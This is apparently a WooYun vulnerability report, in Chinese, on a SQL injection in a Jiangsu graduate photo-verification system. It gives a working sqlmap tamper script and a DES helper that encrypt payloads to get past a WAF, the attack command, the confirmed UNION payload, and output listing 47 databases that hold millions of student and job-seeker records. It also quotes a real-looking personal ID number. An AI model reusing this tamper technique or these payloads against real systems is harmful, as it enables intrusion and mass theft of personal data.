WooYun.org

91job主站改版中，所以这本来存在于**.**.**.**的注入只好用子域名来访问
三个url可访问到“江苏省毕业生电子图像网上校对系统”这个功能
http://**.**.**.**:2008/student 与 http://**.**.**.**:2008/student/均可访问
还有一处http://**.**.**.**/student/ 估计是老版本，数据库连接的也是老的数据库，咱不注它（后来又发现这个注入的数据库可以查看16年以前学生的证件照身份证信息）。
注入点在

http://**.**.**.**:2008/student/result.aspx?cid=&id=A58790A7BEB3C308

cid与id应该是匹配的，此处我删去了cid的内容，cid解密后是'320583199406121026'，之后我直接拼接在tamper中payload上。

逻辑是

DataTable table = NetObject.RvSQL("select photo  FROM [studentphotos].[dbo].[stu_photo" + str2 + "] where id ='" + str + "'", 4).Tables[0];

明显参数id存在注入
但是工具是注入不了的，一是因为有WAF，二是因为参数DES加密。
在把bin目录下的App_Web_5bpc3oeg.dll反编译后（如何得到服务器上的dll呢？那就是另外的漏洞了），打开DESDecryStatic函数看到

哦，DES加密的Key和IV被找到了

有了Key和IV，我就可以写出自己的tamper供sqlmap调用来实现这个注入
pyDes模块可以在这里下载到 -> http://**.**.**.**/des.html
我在sqlmap的tamper目录下写了一个91jobdes2.py，这里把payload处理一下
注入点cid=&id=A58790A7BEB3C308中，id和cid是要匹配一致的，此处cid解开后是'320583199406121026'，所以在payload中加上这一字符串后再做加密。
91jobdes2.py内容

#!/usr/bin/env python
"""
Copyright (c) 2006-2015 sqlmap developers (http://**.**.**.**/)
See the file 'doc/COPYING' for copying permission
"""
from crack_des_91job_1 import des91job
from lib.core.enums import PRIORITY
from lib.core.settings import UNICODE_ENCODING
__priority__ = PRIORITY.LOWEST
def dependencies():
	pass
def tamper(payload, **kwargs):
	"""
	DES encrypt all characters in a given payload
	>>> des91job('select * from')
	'D357DF94F7C6C8DFF06033EA66D82185'
	"""
	payload = '320583199406121026' + payload
	#payload = '65030525 ' + payload
	print payload if 0 else des91job(payload.encode(UNICODE_ENCODING))
	return des91job(payload.encode(UNICODE_ENCODING)) if payload else payload

其中调用的crack_des_91job_1.py的内容有

from pyDes import *
from binascii import unhexlify as unhex 
from binascii import hexlify
from sys import argv
k = des(ShiNiDeKEY, CBC, ShiNiDeIV, pad=None, padmode=PAD_PKCS5)
def crack_des( encrypt_hexed, quchu=0 ):
        global k
        plaintext = k.decrypt(unhex(encrypt_hexed))
        if quchu:
                plaintext = repr(plaintext).split(r'\x')[0].strip("'").strip('"')
        return plaintext
        #print ("Decrypted: %r" % plaintext)
def des91job( plaintext ):
        global k
        d = k.encrypt(plaintext)
        return hexlify(d).upper()
if __name__ == '__main__':
        #print crack_des( argv[1] )
        print '%r'%hexlify(des91job( argv[1] )).upper()

其中des91job函数用来加密字符串，crack_des用来解密字符串
开始用sqlmap注入

python sqlmap.py -u 'http://**.**.**.**:2008/student/result.aspx?cid=&id=A58790A7BEB3C308'  --tamper=91jobdes2 -p cid --user-agent='BaWoPiPanYiFan'  --dbms=mssql --hostname

理所当然地成功注入 （同时，WAF对这样的SQL注入攻击失灵了）

python sqlmap.py -u 'http://**.**.**.**:2008/student/result.aspx?cid=&id=A58790A7BEB3C308'  --tamper=91jobdes2 -p cid --user-agent='BaWoPiPanYiFan'  --dbms=mssql --hostname
         _
 ___ ___| |_____ ___ ___  {1.0-dev-03f32ae}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 17:15:37
[17:15:37] [INFO] loading tamper script '91jobdes2'
[17:15:37] [WARNING] provided value for parameter 'cid' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[17:15:37] [INFO] testing connection to the target URL
A6BBA25A337BB5AA1A37809B00CE99E26D5AB7FDAFCE9B8401668D4A984A46D905EE65887BB9D1D33ED27018D6A6E76DE0F625C94E1FFA3CCD966CF3981FDB40BDFD55FDB0DC9E528C5C0105CA835BFDAF5489222F9F7249068C4EB631D7414A5C01528457DAEF57F4892652B514521F80200C757D307221EC24705EFDAB449A01688B827777B717
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: cid (GET)
    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: cid=-6314' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(112)+CHAR(107)+CHAR(122)+CHAR(113)+CHAR(121)+CHAR(73)+CHAR(72)+CHAR(110)+CHAR(102)+CHAR(70)+CHAR(104)+CHAR(75)+CHAR(113)+CHAR(68)+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(106)+CHAR(113),NULL-- &id=A58790A7BEB3C308
---
[17:15:38] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[17:15:38] [INFO] testing Microsoft SQL Server
[17:15:38] [INFO] confirming Microsoft SQL Server
A6BBA25A337BB5AA1A37809B00CE99E210AFB1B898C36DD684B4F715563392803CFC6010CB81D6A9075D664D461DAB01999B56136CAE4E018E70AAD2A420C1EB35D5014E06A649DFB61FCA4AFD2407B86E55AE63EE73CB9413F1D6233970C28E3994D252772CE9DC920C6752EAE721F4B4F98FCB5726DC738E24CC6ADB50DD88C85C271960FD1348A84F18C2BAE3BEB6E4BC20C8223C02497EE87A9DBC6F30D6DF3B0212EA9B44C268B1C79F9E319C8EED6D63A1648B0A5C4F99CB6D83F761D2B4F2C92ADB034B338E98AB54744B11DBC0EE25EA747070C765CDC29DACB3A2030CE52C347E2F567ADA44B390ADC909CD756D478FEEA9AE3C39C44733E83D5693
sqlmap got a 302 redirect to 'http://**.**.**.**:2008/error.htm'. Do you want to follow? [Y/n] n
A6BBA25A337BB5AA1A37809B00CE99E2EC0BFBC94E986898475A3E898079597185F43576545F509512A67063E8EFED5096C0E1A1AF1FFF2A956A065A505B3978E341BF828205D07C8894DB365D8B908827B624AA7C4053FBD6FBED786CEB7ADCB7828C90720552CA9380066664C105C4D05ACF256CF909CD44FEAA5F9D27AADE36884EFDA2D1CB8977BFF7655D19D2E10A05EC5026B6966CE7F1FAF7BB48EDE488E740B35B19A4C3EDFE282E81E3D457D5EFDDFA9E2F2A7BCA9DF82D8A0540FBD9184FA4245D7B4A3C06521BD97584FF2D5C34F4F349DF0F5F42052975DA1892D733369455B53454284F181EFA27DB810C3ED8B19CA300E0F4116C6952DAE1A6E285BFAF894749A9
[17:15:41] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2005
[17:15:41] [INFO] fetching server hostname
hostname:    'DELL-SQL\DELLSQL'
[*] shutting down at 17:15:41

注一下，有些库没权限读，好丰富的数据
[*] JOB
[*] sa (administrator)
available databases [47]:
[*] CYZXS
[*] DbZSFWW
[*] Degree
Database: Degree
+--------------------+---------+
| Table | Entries |
+--------------------+---------+
| dbo.DegreeData | 4005096 |
| dbo.DegreeData_115 | 1540762 |
[*] dtgl
[*] EduCert
Database: EduCert
+-------------------+---------+
| Table | Entries |
+-------------------+---------+
| dbo.WX | 5518 |
| dbo.查询 | 5518 |
| dbo.Certification | 1 |
[*] Exam
Database: exam
+------------------+---------+
| Table | Entries |
+------------------+---------+
| dbo.AllStudent | 1862358 |
| dbo.AllStudentBK | 1801341 |
| dbo.BkExamUser | 145365 |
[*] exam01
[*] Forums
Database: forums
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| dbo.forums_Party | 7733 |
| dbo.forums_ThreadsRead | 7663 |
| dbo.forums_Exceptions | 5572 |
| dbo.forums_UsersInRoles | 3259 |
| dbo.forums_PrivateMessages | 1998 |
| dbo.forums_UserProfile | 1616 |
| dbo.forums_Users | 1616 |
| dbo.forums_statistics_User | 100 |
[*] IDEA
Database: idea
+-----------------------+---------+
| Table | Entries |
+-----------------------+---------+
| dbo.inschool2013 | 1837513 |
| dbo.T_STUDENT | 1833645 |
| dbo.inschool2012 | 1814346 |
| dbo.inschool2011 | 1795637 |
| dbo.M_USER | 68585 |
| dbo.T_OPUS_POINT_TMP2 | 26791 |
[*] job
[*] jsdcwj
[*] jspdzzw
Database: jspdzzw
+---------------+---------+
| Table | Entries |
+---------------+---------+
| dbo.adminlog | 463 |
| dbo.gov | 104 |
| dbo.affiche | 64 |
| dbo.news | 33 |
[*] manage
[*] master
[*] match
[*] model
[*] msdb
[*] mysqljsbys
[*] NewJOB
Database: NewJOB
+-----------------------------------+---------+
| Table | Entries |
+-----------------------------------+---------+
| dbo.PersonStatus | 3726572 |
| dbo.UnitScoreLog | 2257465 |
| dbo.OutUsers | 1432971 |
| dbo.OutUsersBK | 1353885 |
| dbo.UnitSubmit | 1162769 |
| dbo.UserMessage | 858040 |
| dbo.UserLoginHis | 352065 |
| dbo.UserState | 262996 |
| dbo.BusPrint | 205864 |
| dbo.UnitPositionCount | 112982 |
[*] NlgJOB
Database: NlgJOB
+-----------------------+---------+
| Table | Entries |
+-----------------------+---------+
| dbo.MarketRequest | 106123 |
| dbo.UnitPositionNews | 6461 |
| dbo.MarketStation | 3306 |
| dbo.MarketUnitManage | 2788 |
| dbo.MarketJoin | 1396 |
[*] OaBase
Database: OaBase
+------------------------+---------+
| Table | Entries |
+------------------------+---------+
| dbo.OaMonitor | 606907 |
| dbo.OaPay | 166872 |
| dbo.OaPunch | 108012 |
| dbo.payok | 81270 |
| dbo.OaDocRead | 38610 |
| dbo.OaViewMyDoc | 36999 |
| dbo.OaClassQuestion | 34235 |
| dbo.OaOrderStudent | 31091 |
| dbo.OaRecMail | 18055 |
| dbo.OaViewMyMail | 18048 |
| dbo.OaYZU | 18038 |
| dbo.OaUser | 68 |
[*] Person2009
Database: Person2009
+-----------------------+---------+
| Table | Entries |
+-----------------------+---------+
| dbo.PersonAbility | 524787 |
| dbo.PersonCertifcate | 524787 |
| dbo.PersonContract | 524787 |
| dbo.PersonEducation | 524787 |
| dbo.PersonInformation | 524786 |
| dbo.PersonExperience | 263865 |
| dbo.PersonStore | 168188 |
| dbo.PersonIntent | 141348 |
| dbo.PersonLetter | 131586 |
| dbo.PersonSpare | 96019 |
+-----------------------+---------+
[*] Person2010
[*] Person2011
[*] Person2012
[*] Person2013
[*] Person2014
[*] Person2015
Database: Person2015
+-----------------------+---------+
| Table | Entries |
+-----------------------+---------+
| dbo.PersonAbility | 527721 |
| dbo.PersonCertifcate | 527721 |
| dbo.PersonContract | 527721 |
| dbo.PersonEducation | 527721 |
| dbo.PersonInformation | 527721 |
| dbo.PersonIntent | 527721 |
| dbo.PersonExperience | 56839 |
| dbo.PersonLetter | 19784 |
+-----------------------+---------+
[*] Pioneer
[*] pkyz
[*] Record
Database: Record
+---------------------+---------+
| Table | Entries |
+---------------------+---------+
| dbo.RecordRead | 2178229 |
| dbo.Xwsj | 664359 |
| dbo.BaseUnit | 309143 |
| dbo.DaRecord | 137664 |
| dbo.BkPay | 69587 |
| dbo.BxBM | 22750 |
| dbo.tem | 1632 |
| dbo.BxZPH | 1233 |
| dbo.zzjgdm | 1210 |
| dbo.temp | 498 |
| dbo.ZsbSchool | 357 |
| dbo.BxSchool | 106 |
| dbo.ViewZsbPosition | 59 |
[*] regist
[*] ReportServer$DELLSQL
[*] ReportServer$DELLSQLTempDB
[*] RM_DB
[*] SampleDb
[*] SanJOB
Database: SanJOB
+------------------------------------------------+---------+
| Table | Entries |
+------------------------------------------------+---------+
| dbo.UnitSubmit | 1245176 |
| dbo.ViewUnitSubmitMarket | 1038779 |
| dbo.OutUsers | 503004 |
| dbo.PersonAbility | 487913 |
| dbo.PersonCertifcate | 487913 |
| dbo.PersonContract | 487913 |
| dbo.PersonEducation | 487913 |
| dbo.PersonInformation | 487913 |
| dbo.PersonIntent | 487913 |
| dbo.PersonStatus | 487913 |
| dbo.ViewPersonEducation | 487913 |
| dbo.ViewPPSearch | 487913 |
| dbo.UserState | 262996 |
| dbo.ViewPersonStatus | 251543 |
| dbo.PersonExperience | 241726 |
| dbo.PersonStore | 156272 |
| dbo.ViewPersonStore | 153810 |
| dbo.PersonLetter | 125078 |
| dbo.PersonSpare | 88683 |
| dbo.ViewPersonSpare | 88621 |
| dbo.tick1120 | 54085 |
| dbo.UnitStore | 52008 |
[*] SMS
Database: SMS
+-----------------------+---------+
| Table | Entries |
+-----------------------+---------+
| dbo.PersonEduation | 2028196 |
| dbo.Personinformation | 2028195 |
| dbo.MailSend | 358609 |
| dbo.SMSSend | 22734 |
| dbo.LibraryCourse | 23 |
+-----------------------+---------+
[*] student
[*] Submit
[*] sydwzk
[*] tempdb
[*] votedata
[*] Wzfb
[*] xlzs
Database: xlzs
+------------------+---------+
| Table | Entries |
+------------------+---------+
| dbo.cr10 | 311686 |
| dbo.yh | 69222 |
| dbo.crzy2003 | 30197 |
| dbo.jsgz2005 | 24735 |
| dbo.crkf2003 | 19560 |
| dbo.crzy2005 | 18987 |
| dbo.crkf2005 | 18529 |
| dbo.crkf2004 | 18397 |
| dbo.crzy2004 | 16511 |
| dbo.jsgz2004 | 15246 |
| dbo.crzy2006 | 5619 |
| dbo.crzy2002 | 4979 |
| dbo.[crkf2007-1] | 4866 |
| dbo.crkf2007 | 4796 |
| dbo.crkf2006 | 4211 |
| dbo.crkf2008 | 1795 |
| dbo.temp | 764 |
+------------------+---------+
[*] Yaoqing
[*] zsfw